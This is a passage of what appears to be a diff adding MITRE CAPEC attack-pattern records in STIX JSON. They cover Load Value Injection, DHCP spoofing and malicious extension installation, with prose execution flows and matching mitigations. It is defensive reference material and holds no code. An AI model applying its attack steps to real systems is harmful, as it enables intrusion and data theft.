"x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage dedicated package managers instead of directly linking to VCS repositories.", + "id": "course-of-action--2798a4f8-6cf8-4183-9aa4-0593c6240e67", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8521e30-5610-4802-b738-4fedb6a77770", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2798a4f8-6cf8-4183-9aa4-0593c6240e67", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize version pinning and lock files to prevent use of maliciously modified repositories.", + "id": "course-of-action--ddf12a53-6061-49a0-acd2-8888eafd9817", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97bcf4a9-cd9a-4fc7-803f-183d68cd9ca9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ddf12a53-6061-49a0-acd2-8888eafd9817", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement \"vendoring\" (i.e., including third-party dependencies locally) and leverage automated testing techniques (e.g., static analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--50beff7f-09d4-4623-a555-68ed2973d99d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38bf2a91-cb47-4c20-8845-30d7b0a991f3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50beff7f-09d4-4623-a555-68ed2973d99d", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.", + "id": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97750db1-2852-4168-be21-3c3d533a672b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution in which a faulting or assisted load instruction transiently forwards adversary-controlled data from microarchitectural buffers. By inducing a page fault or microcode assist during victim execution, an adversary can force legitimate victim execution to operate on the adversary-controlled data which is stored in the microarchitectural buffers. The adversary can then use existing code gadgets and side channel analysis to discover victim secrets that have not yet been flushed from microarchitectural state or hijack the system control flow.", + "external_references": [ + { + "external_id": "CAPEC-696", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/696.html" + }, + { + "external_id": "CWE-1342", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1342.html" + }, + { + "description": "Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, Frank Piessens, LVI - Hijacking Transient Execution with Load Value Injection", + "external_id": "REF-735", + "source_name": "reference_from_CAPEC", + "url": "https://lviattack.eu/" + }, + { + "description": "Load Value Injection, 2020--01---27, Intel", + "external_id": "REF-736", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/load-value-injection.html" + } + ], + "id": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Load Value Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack. The adversary looks for code gadgets which will allow them to load an adversary-controlled value into trusted memory. They also look for code gadgets which might operate on this controlled value.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

Experiment

  1. Fill microarchitectural buffer with controlled value: The adversary will utilize the found code gadget from the previous step to load a value into a microarchitectural buffer.

    2. Techniques
    The adversary may choose the controlled value to be memory address of sensitive information that they want the system to access
    The adversary may choose the controlled value to be the memory address of other code gadgets that they wish to execute by hijacking the control flow of the system

  2. Set up instruction to page fault or microcode assist: The adversary must manipulate the system such that a page fault or microcode assist occurs when a valid instruction is run. If the instruction that fails is near where the adversary-controlled value was loaded, the system may forward this value from the microarchitectural buffer incorrectly.

    3. Techniques
    When targeting Intel SGX enclaves, adversaries that have privileges can manipulate PTEs to provoke page-fault exceptions or microcode assists.
    When targeting Intel SGX enclaves, adversaries can indirectly revoke permissions for enclave code through the “mprotect” system call
    An adversary can evict selected virtual memory pages using legacy interfaces or by increasing physical memory utilization
    When attacking a Windows machine, wait until the OS clears the PTE accessed bit. When the page is next accessed, the CPU will always issue a microcode assist for re-setting this bit

Exploit

  1. Operate on adversary-controlled data: Once the attack has been set up and the page fault or microcode assist occurs, the system operates on the adversary-controlled data.

    2. Techniques
    Influence the system to load sensitive information into microarchitectural state which can be read by the adversary using a code gadget.
    Hijack execution by jumping to second stage gadgets found in the address space. By utilizing return-oriented programming, this can chain gadgets together and allow the adversary to execute a sequence of gadgets.
", + "x_capec_extended_description": "This attack is a mix of techniques used in traditional Meltdown and Spectre attacks. It uses microarchitectural data leakage combined with code gadget abuse. Intel has identified that this attack is not applicable in scenarios where the OS and the VMM (Virtual Memory Manager) are both trusted. Because of this, Intel SGX is a prime target for this attack because it assumes that the OS or VMM may be malicious.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.", + "The CPU incorrectly transiently forwards values from microarchitectural buffers after faulting or assisted loads", + "The adversary needs the ability to induce page faults or microcode assists on the target system.", + "Code gadgets exist that allow the adversary to hijack transient execution and encode secrets into the microarchitectural state." + ], + "x_capec_skills_required": { + "High": "The ability to provoke faulting or assisted loads in legitimate execution." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.", + "id": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--533e10e1-fa6d-486b-b385-186ae97f08d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b", + "spec_version": "2.1", + "target_ref": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insert explicit “lfence” speculation barriers in software before potentially faulting or assisted loads. This halts transient execution until all previous instructions have been executed and ensures that the architecturally correct value is forwarded.", + "id": "course-of-action--75932c7c-caa1-4a40-8d0a-cd67606f00cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97595f95-a08b-4ef2-abf5-4cf5d4abc0f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--75932c7c-caa1-4a40-8d0a-cd67606f00cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.\n ", + "external_references": [ + { + "external_id": "CAPEC-697", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Adversary-in-the-Middle: DHCP Spoofing", + "external_id": "T1557.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/003" + }, + { + "description": "Yuval Lazar, DHCP Spoofing 101, 2021--11---03, Pentera", + "external_id": "REF-737", + "source_name": "reference_from_CAPEC", + "url": " https://pentera.io/blog/dhcp-spoofing-101" + }, + { + "description": "T. Melsen, S. Blake, Ericsson, DHCP Spoofing 101, 2006--06, The Internet Society", + "external_id": "REF-738", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc4562.html" + }, + { + "description": "Bosco Sebastian, DHCP Spoofing 101, 2019--08---02, McAfee", + "external_id": "REF-739", + "source_name": "reference_from_CAPEC", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhcp-client-remote-code-execution-vulnerability-demystified/" + } + ], + "id": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DHCP Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Execute Unauthorized Commands" + ], + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In early 2019, Microsoft patched a critical vulnerability (CVE-2019-0547) in the Windows DHCP client which allowed remote code execution via crafted DHCP OFFER packets. [REF-739]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Exsisting DHCP lease: An adversary observes network traffic and waits for an existing DHCP lease to expire on a target machine in the LAN.

    2. Techniques
    Adversary observes LAN traffic for DHCP solicitations

Experiment

  1. Capture the DHCP DISCOVER message: The adversary captures \"DISCOVER\" messages and crafts \"OFFER\" responses for the identified target MAC address. The success of this attack centers on the capturing of and responding to these \"DISCOVER\" messages.

    2. Techniques
    Adversary captures and responds to DHCP \"DISCOVER\" messages tailored to the target subnet.

Exploit

  1. Compromise Network Access and Collect Network Activity: An adversary successfully acts as a rogue DHCP server by redirecting legitimate DHCP requests to itself.

    2. Techniques
    Adversary sends repeated DHCP \"REQUEST\" messages to quickly lease all the addresses within network's DHCP pool and forcing new DHCP requests to be handled by the rogue DHCP server.
", + "x_capec_extended_description": "\n DHCP is broadcast to the entire Local Area Network (LAN) and does not have any form of authentication by default. Therefore, it is susceptible to spoofing.\n An adversary with access to the target LAN can receive DHCP messages; obtaining the topology information required to potentially manipulate other hosts' network configurations.\n To improve the likelihood of the DHCP request being serviced by the Rogue server, an adversary can first starve the DHCP pool.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have access to a machine within the target LAN which can send DHCP offers to the target." + ], + "x_capec_resources_required": [ + "The adversary requires access to a machine within the target LAN on a network which does not secure its DHCP traffic through MAC-Forced Forwarding, port security, etc." + ], + "x_capec_skills_required": { + "Medium": "The adversary must identify potential targets for DHCP Spoofing and craft network configurations to obtain the desired results." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: MAC-Forced Forwarding", + "id": "course-of-action--f8527ee0-b919-44c6-9624-b1882fcd5ea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f36d918-0b20-49cb-a263-39aaa5bd156e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8527ee0-b919-44c6-9624-b1882fcd5ea2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Port Security and DHCP snooping", + "id": "course-of-action--3a6b926d-1185-43d9-b4cb-e5e0103147c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed2696d0-e825-42a5-9f7d-f9fa98137830", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a6b926d-1185-43d9-b4cb-e5e0103147c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Network-based Intrusion Detection Systems", + "id": "course-of-action--671abff4-2c61-4e1e-9620-59ba9d4a9ce7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a28827fa-1c3a-40eb-a7aa-01960d117a6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--671abff4-2c61-4e1e-9620-59ba9d4a9ce7", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.\n ", + "external_references": [ + { + "external_id": "CAPEC-698", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/698.html" + }, + { + "external_id": "CWE-507", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/507.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Browser Extensions", + "external_id": "T1176", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1176" + }, + { + "description": "Server Software Component: IIS Components", + "external_id": "T1505.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/004" + }, + { + "description": "Robert Falcone, OilRig uses RGDoor IIS Backdoor on Targets in the Middle East, 2018--01---25, Palo Alto Networks", + "external_id": "REF-740", + "source_name": "reference_from_CAPEC", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + }, + { + "description": "ASERT Team, STOLEN PENCIL Campaign Targets Academia, 2018--12---05, NETSCOUT", + "external_id": "REF-741", + "source_name": "reference_from_CAPEC", + "url": "https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia" + } + ], + "id": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install Malicious Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In January 2018, Palo Alto's Unit 42 reported that a malicious Internet Information Services (IIS) extension they named RGDoor was used to create a backdoor into several Middle Eastern government organizations, as well as a financial institution and an educational institution. This malware was used in conjunction with the TwoFace webshell and allowed the adversaries to upload/download files and execute unauthorized commands. [REF-740]\n ", + "\n In December 2018, it was reported that North Korea-based APT Kimusky (also known as Velvet Chollima) infected numerous legitimate academic organizations within the U.S., many specializing in biomedical engineering, with a malicious Google Chrome extension. Dubbed \"Operation STOLEN PENCIL\", the attack entailed conducting spear-phishing attacks to trick victims into installing a malicious PDF reader named \"Auto Font Manager\". Once installed, the malware allowed adversaries to steal cookies and site passwords, as well as forward emails from some compromised accounts. [REF-741]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target(s): The adversary must first identify target software that allows for extensions/plugins and which they wish to exploit, such as a web browser or desktop application. To increase the attack space, this will often be popular software with a large user-base.

Experiment

  1. Create malicious extension: Having identified a suitable target, the adversary crafts a malicious extension/plugin that can be installed by the underlying target software. This malware may be targeted to execute on specific operating systems or be operating system agnostic.

Exploit

  1. Install malicious extension: The malicious extension/plugin is installed by the underlying target software and executes the adversary-created malware, resulting in a variety of negative technical impacts.

    2. Techniques
    Adversary-Installed: Having already compromised the target system, the adversary simply installs the malicious extension/plugin themself.
    User-Installed: The adversary tricks the user into installing the malicious extension/plugin, via means such as social engineering, or may upload the malware on a reputable extension/plugin hosting site and wait for unknowing victims to install the malicious component.
", + "x_capec_extended_description": "\n Many software applications allow users to install third-party software extensions/plugins that provide additional features and functionality. Adversaries can take advantage of this behavior to install malware on a system with relative ease. This may require the adversary compromising a system and then installing the malicious extension themself. An alternate approach entails masquerading the malicious extension as a legitimate extension. The adversary then convinces users to install the malicious component, via means such as social engineering, or simply waits for victims to unknowingly install the malware on their systems. Once the malicious extension has been installed, the adversary can achieve a variety of negative technical impacts such as obtaining sensitive information, executing unauthorized commands, observing/modifying network traffic, and more.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must craft malware based on the type of software and system(s) they intend to exploit.", + "If the adversary intends to install the malicious extension themself, they must first compromise the target machine via some other means." + ], + "x_capec_skills_required": { + "Medium": "Optional: Ability to exploit target system(s) via other means in order to gain entry." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only install extensions/plugins from official/verifiable sources.", + "id": "course-of-action--cc64512c-5bfe-4278-8b07-ce829e168728", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2807bdb4-9794-4fc1-bdda-ab3dd9b934e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc64512c-5bfe-4278-8b07-ce829e168728", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm extensions/plugins are legitimate and not malware masquerading as a legitimate extension/plugin.", + "id": "course-of-action--49e26aac-6fb0-47d0-ac5d-189c635bcdc9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6268fd8d-275a-45ec-b2d0-1847ab21681a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49e26aac-6fb0-47d0-ac5d-189c635bcdc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the underlying software leveraging the extension/plugin (including operating systems) is up-to-date.", + "id": "course-of-action--c3450828-c9cf-4d46-a741-9a54bc1a2ccb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71b550d1-dfe9-4f8e-8c1d-fb95610dc91e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3450828-c9cf-4d46-a741-9a54bc1a2ccb", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an extension/plugin allow list, based on the given security policy.", + "id": "course-of-action--61c1c9ea-6c17-4290-ab72-aadec28bff84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b4cc5c1-0de0-4e6e-a975-3e437ac753f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61c1c9ea-6c17-4290-ab72-aadec28bff84", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.", + "id": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--641cc0bb-be70-4115-883e-a3f03bff4bbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c", + "spec_version": "2.1", + "target_ref": 